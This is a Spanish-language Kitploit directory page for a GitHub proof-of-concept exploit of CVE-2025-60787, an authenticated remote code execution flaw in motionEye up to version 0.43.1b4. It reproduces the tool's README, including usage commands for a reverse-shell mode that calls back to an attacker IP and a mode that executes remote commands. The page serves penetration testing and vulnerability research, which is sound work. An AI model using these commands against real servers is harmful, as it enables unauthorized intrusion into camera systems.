Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-60787 — PoC automatizado para CVE-2025-60787 que proporciona ejecución remota de código autenticada contra servidores motionEye hasta la versión 0.43.1b4, con modos de shell inversa y ejecución de comandos. | Kitploit
Herramientas/GitHubGitHub/gunzf0x/cve-2025-60787
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubgunzf0x/cve-2025-60787

CVE-2025-60787

PoC automatizado para CVE-2025-60787 que proporciona ejecución remota de código autenticada contra servidores motionEye hasta la versión 0.43.1b4, con modos de shell inversa y ejecución de comandos.

Ver Repositorio
10122hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-60787 - RCE autenticado en motionEye

PoC para CVE-2025-60787 que es una vulnerabilidad de RCE autenticado para motionEye con todas las versiones afectadas hasta 0.43.1b4 (incluida).

Este es un PoC automatizado para la vulnerabilidad descrita en este repositorio. Créditos a prabhatverma47.

Uso

El script tiene 2 comandos que abusan de la vulnerabilidad. Uno que envía directamente una reverse shell llamado revshell y otro comando llamado command para ejecutar comandos directamente abusando de este CVE.

❯ python3 CVE-2025-60787.py -h

usage: CVE-2025-60787.py [-h] {revshell,command} ...

PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x

positional arguments:
  {revshell,command}  Choose between send a reverse shell or (attempting to) run commands
    revshell          Attempt to send a reverse shell using CVE-2025-60787 vuln
    command           Execute a command remotely using CVE-2025-60787 vuln

options:
  -h, --help          show this help message and exit

Reverse Shell

Usa el comando revshell para obtener una shell. Por ejemplo:

python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001

Donde 10.10.10.10 es la máquina objetivo (la máquina que ejecuta motionEye), 10.10.10.15 es nuestra máquina atacante y 9001 es el puerto en el que estamos escuchando para capturar una reverse shell.

Ejecución de comandos

Si en lugar de una reverse shell queremos ejecutar otros comandos de forma remota, podemos usar la opción command. Por ejemplo, ejecutar el comando ping -c1 10.10.10.15 en la máquina víctima:

python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'

Donde 10.10.10.10 es la máquina que ejecuta motionEye.

Aviso de responsabilidad

Usa este script siempre bajo tu propia responsabilidad.

Sé ético (:

Descargar herramienta